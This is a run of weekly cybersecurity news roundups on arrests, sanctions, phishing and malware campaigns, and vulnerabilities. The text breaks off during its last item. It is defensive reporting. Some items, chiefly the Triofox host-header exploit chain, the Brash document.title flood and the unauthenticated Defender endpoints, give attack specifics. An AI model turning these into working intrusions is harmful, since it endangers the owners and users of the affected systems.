The Good | Poland Detains Russian Hacker Amid Rising Moscow-Linked Sabotage

Poland’s Central Bureau for Combating Cybercrime (CBZC) has arrested a Russian national in Kraków on suspicion of breaching the IT systems of local companies, marking the latest incident tied to what Warsaw describes as Russia’s expanding sabotage and espionage campaign across Europe. According to Polish Interior Minister Marcin Kierwiński, the suspect allegedly compromised corporate-level security defenses to access and manipulate company databases in ways that could have disrupted operations and endangered customers.

Investigators say the man illegally entered Poland in 2022 and later obtained refugee status. He was detained on November 16 by Polish authorities and has since been interrogated, charged, and placed in three months of pre-trial custody. Authorities also believe he may be connected to additional cyberattacks affecting firms in Poland and other EU states, and they are still determining the full scope of the damage.

The arrest comes amid heightened concern over Russian hybrid warfare since Moscow’s invasion of Ukraine in 2022. Poland has linked recent incidents, including sabotage of a railway line and a fire at a major shopping mall, to Russian intelligence activities. The country has shut down all Russian consulates following the events.

EU officials warn that cyberattacks against regional companies and institutions have surged, with many attributed to GRU-backed actors. Other recent disruptions have included payment service outages and leaks of customer data from Polish firms. In response, Polish Digital Affairs Minister Krzysztof Gawkowski plans to invest a record €930 million on bolstering the county’s cybersecurity, underscoring what authorities describe as the urgent need for stronger corporate defenses and deeper international cooperation against increasingly aggressive cyber threats.

The Bad | FBI Warns of Banking Fraud & Account Takeover Schemes Ahead of Holidays

The FBI has issued a PSA about a sharp rise in account takeover (ATO) fraud, with cybercriminals impersonating financial institutions to steal more than $262 million since January 2025. The agency’s Internet Crime Complaint Center (IC3) has received over 5,100 reports this year from victims across individuals, businesses, and organizations across every sector.

The schemes start off with deceiving victims through texts, calls, and emails, posing as bank staff or customer support. They trick targets into revealing their login credentials, multi-factor authentication (MFA) codes, or one-time passcodes (OTPs). Criminals have also been luring victims onto phishing websites engineered to mimic legitimate banking or payroll sites, sometimes boosted through SEO poisoning to appear at the top of search results.

Once inside the victim’s account, fraudsters reset passwords, lock out the rightful owners, and quickly transfer funds into crypto-linked accounts, which makes recovery extremely difficult. Some victims report being manipulated with fabricated claims of fraudulent purchases, or even firearm transactions to incite panic, before being redirected to a second scammer impersonating law enforcement.

As we enter the holiday season, the FBI urges consumers and organizations to monitor their accounts closely, use strong unique passwords, enable MFA, verify URLs, and avoid visiting personal banking sites through search engine results. Victims should immediately contact their financial institutions to request recalls and provide indemnification documents, and then file detailed reports with IC3.

Officials and security experts stress that most ATO cases stem from compromised credentials. Stronger identity verification such as passwordless authentication and enabling manual verification steps remain basic security hygiene necessary for reducing these types of attacks.

The Ugly | OpenAI Alerts API Users After Mixpanel Breach Exposes Limited Data

OpenAI is alerting some ChatGPT API customers that limited personally identifiable information (PII) was exposed after its third-party analytics provider, Mixpanel, was breached. The compromise, stemming from an smishing campaign detected on November 8, affected “limited analytics data related to some users of the API”, but did not compromise ChatGPT or other OpenAI products.

While OpenAI confirmed that sensitive information such as credentials, API keys, requests, and usage data, payment and chat details, or government IDs remained secure, the exposed data may include usernames, email addresses, approximate user location, browser and operating system details, referring websites, and account or organization IDs.

OpenAI said users do not need to reset passwords or regenerate API keys. Some users have reported that CoinTracker, a cryptocurrency tracking platform, may also have been affected, with limited device metadata and transaction counts exposed.

Has @mixpanel not disclosed this breach? Sent from @CoinTracker. pic.twitter.com/xk9nmGVmfm

— Daniel Harrison (@danielh9277) November 27, 2025

OpenAI has begun an investigation, removed Mixpanel from production services, and is notifying affected users directly. The company warns that the leaked data could be used for phishing or social engineering attacks and advises users to verify any messages claiming to relate to the incident, enable MFA, and to never share account credentials via email, text, or chat.

Mixpanel, in turn, has responded to the incident by securing accounts, revoking active sessions, rotating compromised credentials, blocking the threat actor’s IPs, resetting employee passwords, and implementing new controls to prevent future incidents. The analytics firm also reached out to all impacted customers directly.

The incident highlights the risks posed by third-party service providers and the importance of awareness against phishing, even when no core systems or highly sensitive information are directly compromised.

The Good | Courts Prosecute DPRK Fraud, Ransomware Hosting & Crypto Mixer Ops

Five people have pleaded guilty to helping the DPRK run illicit revenue schemes involving remote IT worker fraud and cryptocurrency theft. The group enabled North Korean operatives to obtain U.S. jobs using false or stolen identities, generating over $2.2 million while impacting 136 companies. The DOJ is also seeking forfeiture of $15 million tied to APT38 cyber-heists. The defendants, Oleksandr Didenko, Erick Prince, Audricus Phagnasay, Jason Salazar, and Alexander Travis, admitted to stealing U.S. identities for overseas workers and laundering stolen funds.

In the U.S., U.K., and Australia, authorities have issued a coordinated sanction against Russian bulletproof hosting (BPH) providers that enable ransomware groups by leasing servers to support malware delivery, phishing attacks, and illicit content hosting. To help cybercriminals evade capture, BPH services ignore abuse reports and law enforcement takedowns. OFAC has sanctioned Media Land, its sister companies, and three executives all tied to LockBit, BlackSuit, Play, and other threat groups. Five Eyes agencies also released guidance to help ISPs detect and block malicious infrastructure used by BPH services.

Our joint guidance on bulletproof hosting providers highlights best practices to mitigate potential cybercriminal activity, including recommended actions that ISPs can implement to decrease the usefulness of BPH infrastructure. Learn more https://t.co/cGQpuLpBPP pic.twitter.com/tM55acfuQv

— CISA Cyber (@CISACyber) November 19, 2025

The founders of Samourai Wallet, a cryptocurrency mixing service, have been sentenced to prison for laundering over $237 million. Operating since 2015, Samourai used its ‘Whirlpool’ mixing system and ‘Ricochet’ multi-hop transactions to obscure Bitcoin flows. These features made tracing more difficult and enabled criminals involved in darknet markets, drug trafficking, and cybercrime to launder more than $2 billion. Authorities seized the platform, including its servers, domains, and mobile app, while the founders agreed to forfeit all traceable proceeds. CEO Keonne Rodriguez has received five years, while CTO William Lonergan Hill received four along with supervised release. The pair were ordered to pay fines of $250,000 each.

The Bad | DPRK Actors Build Fake Job Platform to Lure AI Talent & Push Malware

As part of their ongoing and evolving Contagious Interview campaign, DPRK-based threat actors have created a fake job platform designed to compromise legitimate job seekers, particularly in the AI research, software development, and cryptocurrency verticals. While earlier fraudulent IT-worker schemes relied on targeting individuals through phishing on social media platforms, the latest tactic weaponizes a fully functional hiring pipeline.

Researchers discovered the latest lure – a Next.js-based job portal hosted at lenvny[.]com, complete with dozens of fabricated AI and crypto-industry job listings. The listings mimic branding from major tech companies and feature a polished UI and full recruitment workflow that mirrors modern hiring systems, encouraging applicants to submit resumes and professional links before prompting them to record a video introduction.

This final step triggers the DPRK-favored ClickFix technique: When applicants copy the fake interview instructions, a hidden clipboard hijacker swaps their text with a multi-stage malware command. When pasted into a terminal, it downloads and executes staged payloads under the guise of a “driver update”, ultimately launching a VBScript-based loader. This design blends seamlessly with typical remote-work interview processes and dramatically increases the likelihood of accidental execution.

The platform also performs strategic filtering, attracting AI and crypto professionals specifically as their skills, network access, and workstation devices tend to align with DPRK’s intelligence and financial priorities including model-training infrastructure to crypto exchange systems. The campaign reflects significant maturation in DPRK social engineering tradecraft, pairing high-fidelity UI design with covert malware delivery. Job seekers are advised to verify domains, avoid off-platform hiring systems, and execute any requested code only in sandboxed environments.

The Ugly | Iran-Backed Actors Weaponize Cyber Recon to Power Real-World Attacks

Iranian-linked threat actors are using cyber operations to support real-world military activity, a pattern described by researchers as “cyber-enabled kinetic targeting”.

In the past, conventional security models separated cyber and physical domains – delineations that are proving artificial in today’s socioeconomic and political climate. Now, these are not just cyber incidents that cause physical impact, but rather coordinated campaigns upon which digital operations are built to advance military objectives.

One example involves Crimson Sandstorm (aka Tortoiseshell and TA456), a group tied to Iran’s Islamic Revolutionary Guard Corps (IRGC). Between December 2021 and January 2024, the group probed a ship’s Automatic Identification System (AIS) before expanding their operations to other maritime platforms. On January 27, 2024, the group searched for AIS location data on one particular shipping vessel. Days later, that same ship was targeted in an unsuccessful missile strike by Iranian-backed Houthi forces, which have mounted repeated missile attacks on commercial shipping in the Red Sea amid the Israel–Hamas conflict.

A second case highlights Mango Sandstorm (aka Seedworm and TA450), a group affiliated with Iran’s Ministry of Intelligence and Security (MOIS). In May, the group set up infrastructure for cyber operations and gained access to compromised CCTV feeds in Jerusalem to gather real-time visual intelligence. Just a month later, the Israel National Cyber Directorate confirmed Iranian attempts to access cameras during large-scale attacks, reportedly to get feedback on where the missiles hit and improve precision. Both highlighted cases show the attackers’ reliance on routing traffic through anonymizing VPNs to prevent attribution.

The divide between digital intrusions and physical warfare continues to blur. With nation state groups leveraging cyber reconnaissance as a precursor for physical attacks, it is likely we will continue to see significant developments in this kind of hybrid warfare.

The Good | FBI and Europol Arrest Ransomware Broker and Dismantle Major Botnet

Russian national, Aleksey Olegovich Volkov, is set to plead guilty for acting as an initial access broker (IAB) for Yanluowang ransomware attacks targeting at least eight U.S. companies from July 2021 to November 2022.

Using aliases like “chubaka.kor” and “nets”, Volkov sold access to the ransomware group after breaching his victim’s corporate networks and demanding ransoms from $300,000 to $15 million in Bitcoin. FBI investigators traced Volkov through iCloud, cryptocurrency records, and social media, recovering chat logs, stolen credentials, and evidence of ransom negotiations, which all linked him to $1.5 million in collected payments.

His breaches affected companies across multiple states, including banks, engineering firms, and telecoms. Volkov faces up to 53 years in prison and over $9.1 million in restitution for charges including trafficking in access, identity theft, computer fraud, and money laundering.

Law enforcement agencies across several countries dismantled over 1000 servers linked to the Rhadamanthys infostealer, VenomRAT, and Elysium botnet as part of Operation Endgame, an international effort against cybercrime. Coordinated by Europol and Eurojust with support from private partners, the action consisted of searches at 11 locations in Germany, Greece, and the Netherlands, where officers seized 20 domains and arrested a key VenomRAT suspect.

The disrupted infrastructure involved hundreds of thousands of infected devices and millions of stolen credentials, including access to over 100,000 crypto wallets. Rhadamanthys, active since 2023, had seen rapid growth in late 2025, affecting thousands of IP addresses daily.

Authorities recommend checking systems for infection via politie.nl/checkyourhack and haveibeenpwned.com. Operation Endgame has previously disrupted numerous malware and ransomware networks, including Bumblebee, IcedID, Pikabot, Smokeloader, SystemBC, and Trickbot, highlighting ongoing international efforts to curb cybercrime.

The Bad | UNC6485 Exploits Triofox Vulnerability for Remote Code Execution

Threat actors have exploited a critical vulnerability in Gladinet’s Triofox file sharing and remote access platform, chaining it with the product’s built-in antivirus scanner to gain SYSTEM-level remote code execution (RCE).

The vulnerability, tracked as CVE-2025-12480, allows attackers to abuse an access control logic error that grants admin privileges when the request host equals ‘localhost’. By spoofing this value in the HTTP host header, an attacker can reach sensitive setup pages without credentials, especially on systems where the TrustedHostIp parameter was never configured.

Security researchers first discovered an intrusion in August targeting a Triofox instance running version 16.4.10317.56372. They later determined that the threat cluster UNC6485 used a malicious HTTP GET request containing a localhost header to access the AdminDatabase.aspx setup page.

Using this workflow, the attackers created a rogue administrator account called ‘Cluster Admin’, uploaded a malicious script, and configured Triofox to treat that script as the antivirus scanner path. Since the scanner inherits SYSTEM-level privileges from the parent process, this allowed the attackers to execute arbitrary code.

The payload then launches a PowerShell downloader to retrieve a Zoho UEMS installer, which subsequently deploys Zoho Assist and AnyDesk on the compromised host for remote access and lateral movement. The attackers were also observed using Plink and PuTTY to establish SSH tunnels and forward traffic to the compromised host’s RDP port.

Gladinet has since fixed CVE-2025-12480 in Triofox version 16.7.10368.56560, and administrators are urged to update to the latest release (16.10.10408.56683), review admin accounts, and ensure the antivirus engine is not configured to run unauthorized binaries.

The Ugly | Attackers Exploit Zero-Day to Steal Washington Post Employee Data

The Washington Post, one of the vendors impacted by a breach targeting Oracle software, is notifying nearly 10,000 current and former employees and contractors that their personal and financial information has been exposed in the data theft campaign.

The Post, one of the largest U.S. newspapers with 2.5 million digital subscribers, confirmed that attackers accessed parts of its network between July 10 and August 22 by exploiting a previously unknown zero-day vulnerability in Oracle E-Business Suite, the organization’s internal enterprise resource planning (ERP) system. The vulnerability is tracked as CVE-2025-61884.

According to the letter sent to affected individuals, the Post learned of the intrusion after a threat actor contacted the company on September 29 claiming access to its Oracle applications. Post-breach investigations identified the widespread flaw that allowed the attackers to access many Oracle customers’ applications. The attackers used this flaw to steal sensitive data and later attempted to extort the Post and other organizations breached in the same campaign.

Although the Post did not name the group responsible, the Cl0p ransomware operation is suspected to be behind the attacks. Other high-profile victims of the same Oracle zero-day include Harvard University, Envoy Air, and GlobalLogic, with additional impacted organizations listed on Cl0p’s leak site.

The Post’s investigation has determined that data belonging to 9,720 individuals was compromised. Exposed information includes full names, Social Security numbers, tax and ID numbers, and bank account and routing numbers. Impacted individuals have been offered 12 months of free identity protection through IDX and advised to place credit freezes on their accounts and fraud alerts for additional protection.

The Good | Authorities Crack Down on Ransomware, Crypto Fraud & DPRK Laundering Ops

Three ex-employees of cybersecurity firms DigitalMint and Sygnia have been indicted for participating in BlackCat (aka ALPHV) ransomware attacks on five U.S. companies between May and November 2023.

The defendants allegedly acted as BlackCat affiliates, breaching networks, stealing data, deploying encryption malware, and demanding cryptocurrency ransoms. Victims included medical, pharmaceutical, and engineering firms. Prosecutors say the ransom demands ranged from $300,000 to $10 million, with one company paying out $1.27 million. The trio faces up to 50 years each in prison if convicted.

Also this week, the U.S. Treasury sanctioned two North Korean financial institutions and eight individuals for laundering cryptocurrency stolen via fraudulent IT worker schemes. The designated include Ryujong Credit Bank and Korea Mangyongdae Computer Technology Company (KMCTC), along with executives and bankers responsible for managing funds linked to ransomware attacks and UN sanctions violations.

OFAC says that over the last 3 years DPRK-affiliated cybercriminals have stolen more than $3 billion in cryptocurrency using malware and social engineering. The sanctions freeze U.S. assets and warn that transactions with these entities risk secondary penalties.

In Europe, authorities have arrested nine suspects involved in a cryptocurrency fraud network responsible for stealing over €600 million ($689 million) across multiple countries. The criminals allegedly created fake crypto investment platforms that promised high returns and recruited victims through social media, cold calls, and fake endorsements from celebrity investors. Victims lost their funds while the suspects laundered the stolen assets using blockchain tools. In operations coordinated by Eurojust in Cyprus, Spain, and Germany, law enforcement seized cash, crypto, and bank accounts.

The Bad | SleepyDuck Trojan Exploits Ethereum Smart Contracts to Evade Takedown

A new remote access trojan (RAT) dubbed ‘SleepyDuck’ has been masquerading as a well-used Solidity extension on the Open VSX open-source registry, researchers say. The malware uses Ethereum smart contracts to manage its command and control (C2) communications, helping it to maintain persistence even if its main server is taken down.

Initially benign when published on October 31, the infected extension, juan-bianco.solidity-vlang, became malicious after an update made the following day, by which time it had already been downloaded 14,000 times. For now, the extension remains available on Open VSX with a public warning. In total, it has been downloaded over 53,000 times.

Security researchers report that SleepyDuck activates when the code editor starts, a Solidity file opens, or when a compile command runs. It disguises its malicious activity through a fake webpack.init() function from extension.js, while secretly executing payloads that collect system information such as hostnames, usernames, MAC addresses, and timezones.

After it is triggered, the trojan queries the Ethereum blockchain to find the fastest RPC provider, read its C2 details, and enter a polling loop for new instructions. This blockchain-based C2 redundancy means that even if the main C2 domain (sleepyduck[.]xyz) is disabled, the malware can still fetch updated addresses or commands from the blockchain, making takedown efforts much more difficult.

In response, Open VSX has introduced new security measures, including shorter token lifetimes, automated scans, revoking any leaked credentials, and working in coordination with VS Code to block emerging threats. Best practices for developers include verifying extension publishers and installing software only from trusted repositories to avoid supply-chain compromises.

The Ugly | Iran-Based Actors Target U.S. Policy Experts in New Espionage Campaign

Between June and August, a newly identified threat cluster dubbed ‘UNK_SmudgedSerpent’ launched a series of targeted cyberattacks against U.S.-based academics and foreign policy experts focused on the Middle East. The campaign, coinciding with rising Iran-Israel tensions, uses politically-themed lures related to Iranian domestic affairs and the militarization of the Islamic Revolutionary Guard Corps (IRGC).

Researchers say the threat actors behind the campaign initiated attacks with benign email exchanges before introducing phishing links impersonating prominent U.S. foreign policy figures and think tank institutions like the Brookings Institution and Washington Institute.

The targeted victims, over 20 U.S.-based experts on Iran-related policy, were enticed to open malicious meeting documents and login pages designed to harvest their Microsoft account credentials. In some attacks, the attackers sent URLs leading to fake MS Teams login pages but pivoted to spoofed OnlyOffice sites if the victim grew suspicious.

Clicking the links led to the download of malicious MSI installers disguised as Microsoft Teams, which then deployed legitimate remote monitoring and management (RMM) software like PDQ Connect. Subsequent activity suggests attackers manually installed additional tools such as ISL Online, indicating possible hands-on-keyboard intrusion.

Researchers note that the operation’s tactics mirror those of known Iranian cyberespionage groups such as TA455 (aka UNC1549, Smoke Sandstorm), TA453 (aka TunnelVision, APT 35, UNC788), and TA450 (aka TEMP.Zagros).

The researchers believe UNK_SmudgedSerpent’s campaigns are part of a broader collection effort by Iranian intelligence aimed at gathering insights from Western experts on regional policy, academic analyses, and strategic technologies.

The Good | Former GM of DoD Contractor Pleads Guilty to Selling U.S. Cyber Secrets

Peter Williams, a former general manager at U.S. defense contractor L3Harris Trenchant, has pleaded guilty in U.S. federal court to two counts of stealing and selling classified cybersecurity tools and trade secrets to a Russian exploit broker.

Between 2022 and 2025, Williams stole at least eight restricted cyber-exploit components that were developed for the U.S. government and select allied partners. The DoJ stated that these tools, valued at $35 million, were part of Trenchant’s sensitive research and were never intended for foreign sale. Williams sold them for at least $1.3 million in cryptocurrency, signing formal contracts with the Russian intermediary for the initial sale of the components as well as a promise to provide follow-on technical support. Williams used the illicit proceeds to purchase luxury items, according to court filings.

Trenchant, L3Harris Technologies’ cyber capabilities arm, develops advanced offensive and defensive tools used by government agencies within the Five Eyes intelligence alliance. According to the DoJ, Williams abused his privileged access at Trenchant Systems to siphon the data, giving various customers of the broker, including the Russian government and other foreign cyber threat actors, an edge in targeting U.S. citizens, businesses, and critical infrastructure.

While the court reports did not name the broker, prior reporting suggests it may be Operation Zero, a Russian platform known for buying and reselling zero-day exploits, often rewarding developers with large cryptocurrency payouts.

Williams now faces up to 10 years in prison and fines of $250,000 or twice the profit gained. As international cyber brokers expand in their roles as international arms dealers, law enforcement officials reaffirm their hard stance against malicious insiders abusing their positions of trust.

The Bad | New “Brash” Flaw Crashes Chromium Browsers with Timed Attacks

Security researcher Jose Pino has disclosed a severe vulnerability in Chromium’s Blink rendering engine that allows attackers to crash Chromium-based browsers within seconds. Pino has named the vulnerability “Brash” and attributes it to an architectural oversight that fails to rate-limit updates to the document.title API. Without the rate-limiting, an attacker can generate millions of document object model (DOM) mutations per second by repeatedly changing the page title, overwhelming the browser, and consuming CPU resources until the UI thread becomes unresponsive.

The Brash exploit occurs in three phases. First, the attacker prepares a hash seed by loading 100 unique 512-character hexadecimal strings into memory to vary title updates and maximize the impact of the attack. Then, the attacker launches burst injections that perform three consecutive document.title updates in a row, which in default test settings inject roughly 24 million updates per second using a burst size of 8,000 and a 1 ms interval. Lastly, the sustained stream of updates saturates the browser’s main thread, forcing both the tab and the browser to hang or crash and requiring forced termination.

Brash can be scheduled to run at precise moments, enabling a logic-bomb style attack that remains dormant until a timed trigger activates. This increases the danger since attackers can control when the large-scale disruption will occur. Hypothetically, a single click on a specially crafted URL can detonate the attack with millisecond accuracy and little initial indication.

The vulnerability affects Google Chrome and all Chromium-based browsers, including Microsoft Edge, Brave, Opera, Vivaldi, Arc, Dia, OpenAI ChatGPT Atlas, and Perplexity Comet. WebKit-based browsers such as Mozilla Firefox and Apple Safari are not vulnerable to Brash as well as any iOS third-party browsers.

The Ugly | Hacktivists Manipulate Canadian Industrial Systems, Triggering Safety Risks

The Canadian Centre for Cyber Security has issued a warning that hacktivists have breached multiple critical infrastructure systems across Canada, altering industrial controls in ways that could have created dangerous conditions. The alert highlights rising malicious activity that targets internet-exposed Industrial Control Systems (ICS) and urges firms to shore up their security measures to prevent such attacks.

The bulletin cites three recent incidents. In the first, a water treatment facility experienced tampering with water pressure controls, degrading service for the local community. Following that, a Canadian oil and gas company had its Automated Tank Gauge (ATG) manipulated, triggering false alarms. In a third breach, a grain drying silo on a farm had temperature and humidity settings altered, creating potentially unsafe conditions if the changes had gone undetected.

Authorities believe these attacks were opportunistic rather than being technically sophisticated, and intended to attract media attention, underme public trust, and harm the reputation of Canadian authorities. Hacktivists have been known to collaborate with advanced persistent threat (APT) groups to amplify the reach of disruptive acts and cause public unrest.

Although none of the targeted facilities suffered damage, the incidents underline inherent risks in poorly protected ICS, including programmable logic controllers (PLCs), supervisory control and data acquisition (SCADA) systems, human-machine interfaces (HMIs), and industrial IoT devices.

The Cyber Centre recommends that organizations inventory and secure internet-accessible ICS devices, remove direct internet exposure where possible, implement VPNs with multi-factor authentication (MFA), maintain regular firmware updates, and conduct regular penetration testing. Resources like the Cyber Security Readiness Goals (CRGs) can offer guidance for critical infrastructure firms and officials remind organizations that suspicious activity should be reported via My Cyber Portal or to local authorities to reduce risks of future compromise.

The Good | Europol Dismantles Global SIM-Box Fraud Network

Europol has dismantled a major cybercrime-as-a-service (CaaS) operation, codenamed SIMCARTEL, that powered over 3,200 fraud cases and caused at least €4.5 million in damages. The network operated 1,200 SIM-box devices containing some 40,000 SIM cards, enabling criminals to rent phone numbers registered to individuals in more than 80 countries. These were then used to create 49 million fraudulent online accounts for crimes including phishing, investment fraud, extortion, impersonation, and migrant smuggling.

The illegal service, run through gogetsms.com and apisim.com, worked by selling access to “fast and secure temporary” phone numbers marketed for anonymous communication and account verification. GoGetSMS also offered users a way to monetize their own SIM cards. However, reviews suggested it was a front for large-scale identity fraud, now exposed as one of Europe’s most extensive SIM-box schemes to date. Europol said the infrastructure was “technically highly sophisticated”, which allowed perpetrators worldwide to hide their identities while conducting telecom-based fraud.

After running coordinated raids across Austria, Estonia, Finland, and Latvia, police arrested seven suspects in total. They also seized five servers, the two websites, hundreds of thousands of SIM cards, €431,000 deposited in bank accounts, €266,000 in crypto, and four luxury vehicles. Both domains have been taken down and now display official law enforcement banners.

So far, authorities have linked the network to 1,700 fraud cases in Austria and 1,500 in Latvia, with combined losses adding up to nearly €5 million. Europol’s forensic analysis of the seized servers aims to identify customers of the illegal service.

The Bad | Jingle Thief Exploits Cloud Identities for Large-Scale Gift Card Fraud

A new report from security researchers details the activities of ‘Jingle Thief’, a financially motivated threat group that operates almost entirely in cloud environments to conduct large-scale gift card fraud. Active since at least 2021, the group targets retail and consumer services organizations through phishing and smishing campaigns designed to steal Microsoft 365 credentials.

Once inside, the attackers exploit cloud-based infrastructure to impersonate legitimate users, gain unauthorized access to sensitive data, and manipulate gift card issuance systems. With their campaigns focusing on mapping cloud networks, attackers can move laterally across accounts and avoid detection through stealthy tactics such as creating inbox rules, forwarding emails, and registering rogue authenticator apps to bypass MFA in M365.

Unlike traditional malware-driven attacks, Jingle Thief relies heavily on identity misuse, choosing to leverage stolen credentials instead of deploying custom payloads to blend in with normal user activity. This approach allows them to maintain access for many months while issuing or selling unauthorized gift cards for profit on gray markets.

Researchers also observed a major wave of Jingle Thief activity between April and May 2025, during which the group compromised more than 60 user accounts within a single organization. The attackers conducted extensive reconnaissance in SharePoint and OneDrive, searching for financial workflows, IT documentation, and virtual machine configurations, all tied to gift card systems.

Exploiting cloud identities rather than endpoints furthers the trend of cloud-based cybercrime, where phished credentials and identity abuse enable financially motivated actors to scale operations while remaining under the radar. Jungle Thief’s campaign is a reminder to prioritize identity-based monitoring and cloud-native security measures that provide full visibility and real-time detection.

The Ugly | PhantomCaptcha Spearphishing Targets Ukraine’s Relief Networks

SentinelLABS, together with the Digital Security Lab of Ukraine, have uncovered ‘PhantomCaptcha’, a single-day spearphishing campaign that targeted Ukrainian regional government administrations and humanitarian organizations such as the International Red Cross, UNICEF, the Norwegian Refugee Council, and other NGOs linked to war relief efforts.

Launched on October 8, 2025, the operation began with an impersonation of the Ukrainian President’s Office, distributing weaponized PDF attachments that redirected victims to a fake Zoom site (zoomconference[.]app). There, a fake Cloudflare CAPTCHA lured users into copying and pasting malicious PowerShell commands – a ClickFix technique designed to bypass traditional endpoint controls by tricking victims into executing the malware themselves.

Once running, the script deployed a multi-stage PowerShell payload leading to a WebSocket remote access trojan (RAT) hosted on Russian-owned infrastructure. The RAT enables arbitrary command execution, data exfiltration, and the potential deployment of further malware through encrypted WebSocket communications. Although investigations show that the attackers spent six months preparing the campaign, it remained active for only 24 hours, pointing to an infrastructure that demonstrates sophisticated operational security and planning.

SentinelLABS linked the campaign to an additional Android-based espionage effort hosted on princess-mens[.]click, which distributes spyware-laden APKs disguised as adult entertainment or cloud storage apps designed to harvest contacts, media files, and geolocation data.

While attribution remains unconfirmed, technical overlaps, including the ClickFix lure and Russian-hosted C2s, suggest possible ties to COLDRIVER (aka UNC4057 or Star Blizzard), a threat group linked to Russia’s Federal Security Service (FSB). PhantomCaptcha is an example of a highly organized and adaptive adversary, able to blend social engineering, short-lived but highly compartmentalized infrastructure, and cross-platform espionage to target Ukraine’s humanitarian and government sectors.

The Good | DOJ Seizes $15B in Crypto, Targets Global Scam Ring & PowerSchool Hacker

The U.S. Department of Justice has seized $15 billion in bitcoin from the Prince Group, a vast criminal syndicate behind cryptocurrency scams known as romance baiting. Led by fugitive Chen Zhi (aka Vincent), the group defrauded billions from victims through fake investment schemes disguised as romantic or business opportunities. Operating across 30+ countries, Prince Group forced trafficked workers into Cambodian compounds to run these scams under threat of violence.

The organization laundered illicit gains through complex crypto transfers before converting them into cash for luxury assets, including yachts, jets, and even a Picasso painting. In coordination with the U.K., the U.S. Treasury has sanctioned Zhi and 146 of his associates. Authorities, on the whole, estimate that Americans lost $16.6 billion to such scams last year, with Southeast Asian-based operations driving most of this increase. As global authorities intensify crackdowns on large-scale fraud and cybercrime operations, U.S. law enforcement continues to pursue domestic offenders exploiting digital platforms for profit.

Matthew D. Lane, a 19-year-old from Massachusetts, was sentenced to four years in prison and ordered to pay $14 million in restitution for orchestrating a severe cyberattack on PowerSchool, a leading K–12 software provider serving over 60 million students worldwide. Lane and his accomplices used stolen subcontractor credentials to breach PowerSchool’s systems, stealing data on 9.5 million teachers and 62.4 million students, including social security numbers and medical records. They demanded $2.85 million in Bitcoin under the alias “Shiny Hunters”.

Despite PowerSchool paying an undisclosed ransom to prevent a data leak, the group continued additional extortion attempts on several affected school districts. Lane pleaded guilty to multiple federal cybercrime charges in May.

The Bad | North Korean Hackers Deploy EtherHiding to Steal Cryptocurrency

North Korean state-sponsored hackers have begun using a novel malware-hosting method called “EtherHiding” to steal cryptocurrency, marking the first time a nation-state actor has employed this blockchain-based technique. Researchers attribute the activity to the DPRK-linked cluster UNC5342, which has been deploying EtherHiding since February 2025 as part of its ongoing “Contagious Interview” campaign. The group uses fake job offers to lure software developers, posing as recruiters from fake companies. During technical assessments, victims are tricked into running malicious code, initiating the multi-stage infection chains.

EtherHiding embeds malicious payloads within smart contracts on public blockchains, including Ethereum and Binance Smart Chain, allowing attackers to fetch the malware via read-only calls that leave no trace of the transaction. This method provides anonymity, is resilient to takedowns, and provides the flexibility to update payloads at minimal cost, an average of $1.37 USD per update. The payloads include JADESNOW, a JavaScript downloader, and InvisibleFerret, a backdoor for credential theft, remote control, and exfiltration of cryptocurrency wallet data and browser-stored passwords.

Researchers note that the threat actor’s use of multiple blockchains suggests operational compartmentalization and makes forensic analysis more difficult. The approach demonstrates a shift toward bulletproof hosting, using blockchain technology to create takedown-resistant, flexible malware distribution.

Users should exercise caution with job-related downloads and adopt best practices such as testing files in isolated environments, restricting executable file types, and enforcing strict browser policies to block script auto-execution.

The Ugly | Flaws in Microsoft Defender Could Lead to Theft of Data

Researchers have reported unpatched vulnerabilities in Microsoft Defender for Endpoint (DFE) that could enable attackers to bypass authentication, spoof data, exfiltrate sensitive information, and inject malicious files into forensic evidence collections used by security analysts.

Reported to Microsoft’s Security Response Center in July 2025, the issues were categorized as low severity, with no confirmed fixes as of this writing. Researchers tracking the flaws focused on how the agent communicated with cloud backends, using tools like Burp Suite and WinDbg memory patches to bypass certificate pinning in MsSense.exe and SenseIR.exe, allowing plaintext interception of HTTPS traffic, including Azure Blob uploads.

The core problem lies in DFE requests to endpoints such as /edr/commands/cnc and /senseir/v1/actions/, where Authorization tokens and headers are ignored. Low-privileged users can obtain machine and tenant IDs from the registry to impersonate the agent, intercept commands, or spoof responses such as faking an “already isolated” status while leaving devices exposed. Similarly, CloudLR tokens for Live Response and Automated Investigations are ignored, allowing payload manipulation and uploads to Azure Blob URIs.

In addition, attackers can access 8MB configuration dumps without credentials, revealing detection logic like RegistryMonitoringConfiguration and ASR rules, while investigation packages on disk can be tampered with, embedding malicious files disguised as legitimate artifacts.

Despite responsible disclosure by the researchers concerned, it remains unknown whether Microsoft will patch the flaws any time soon.

The Good | Teens Arrested in Nursery Doxing Case as OpenAI Disrupts Cybercrime Clusters

U.K. police have arrested two 17-year-olds in Hertfordshire for allegedly doxing children following a ransomware attack on London-based Kido nurseries. The Radiant Group claimed responsibility, saying they stole sensitive data and photos of over 8000 children and leaked some online to extort Kido. Later, the files were removed after the groups’ threats to both Kido and parents of the affected children failed to make headway. Kido, supporting over 15,000 families in the U.K, U.S, China, and India, confirmed the breached data was hosted by Famly, a nursery software platform, which said its systems were not compromised.

The UK’s NCSC called the attack on children “particularly egregious” and the Met Police emphasized their commitment to bringing the perpetrators to justice. The arrests reflect a wider trend of teenagers involved in major U.K. cyberattacks, with recent cases linked to Marks & Spencer, Co-op, Harrods, and Transport for London.

Also this week, OpenAI said it disrupted three malicious activity clusters abusing ChatGPT for cybercrime and influence operations. The first involved Russian-speaking actors using multiple accounts to develop components of remote access trojans (RATs), credential stealers, and data exfiltration tools. The second, tied to North Korean actors, used ChatGPT to assist in malware, phishing, and C2 development – using the chatbot to draft copy, perform experiments, and explore new techniques. The third was linked to Chinese threat group ‘UNK_DropPitch’, which leveraged the tool to create multilingual phishing content and automate hacking tasks.

Beyond these, OpenAI also blocked networks from Cambodia, Myanmar, Nigeria, Russia, and China for using AI in scams, propaganda, and surveillance, though all mentioned actors tried to mask signs of their abuse of the tool to further their operations.

The Bad | Crimson Collective Group Breach Cloud Systems to Steal Data & Extort Victims

A threat group called ‘Crimson Collective’ has launched a series of targeted attacks on AWS cloud environments, stealing sensitive data and extorting victims through multi-stage intrusions. The group just recently exfiltrated 570 GB of data from thousands of private GitLab repositories before joining forces with Scattered Lapsus$ Hunters to intensify its extortion efforts.

